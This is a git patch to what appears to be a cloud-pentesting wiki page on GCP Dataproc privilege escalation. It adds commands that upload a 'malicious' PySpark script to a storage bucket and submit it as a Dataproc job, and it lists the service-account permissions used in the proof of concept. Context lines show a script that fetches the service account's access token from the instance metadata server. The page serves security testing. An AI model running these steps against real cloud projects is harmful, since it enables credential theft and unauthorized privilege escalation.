From dbac949488e9011b8f1ab08bd3f4ab7bd7dee67f Mon Sep 17 00:00:00 2001 From: Mac Date: Sun, 26 Jan 2025 21:53:14 +0400 Subject: [PATCH] dataproc privesc update --- .../gcp-dataproc-privesc.md | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md index 8dee9c50c..fa004ef8c 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md @@ -12,10 +12,16 @@ roles/dataproc.admin - Full control over Dataproc clusters, including creating, These permissions make both roles highly sensitive and dangerous if misused. +## dataproc.jobs.create & dataproc.clusters.use + +The following method - projects.regions.jobs.submit enables a SA to create a dataproc job, which can be abused as shown in the example below. it must be noted that in order to exploit these permissions SA should also have the necessary privileges to move the malicious script to the storage bucket (storage.objects.create). + +the following permissions were assigned to the SA for the PoC (dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get, storage.objects.list) + ## Privilege Escalation via Metadata Token Leaking -By abusing the permissions granted by roles/dataproc.editor or roles/dataproc.admin, an attacker can: + - Submit a job to a Dataproc cluster. @@ -29,7 +35,7 @@ The following script demonstrates how an attacker can submit a job to a Dataproc import requests -# Metadata server URL to fetch the access token +## Metadata server URL to fetch the access token ``` metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token" @@ -53,6 +59,9 @@ if __name__ == "__main__": ### Steps to exploit ``` +# Copy the script to the storage bucket +gsutil cp fetch-metadata-token.py gs://dataproc-poc-bucket-hacktest/fetch-metadata-token.py +# Submit the malicious job gcloud dataproc jobs submit pyspark gs:///fetch_metadata_token.py \ --cluster= \ --region=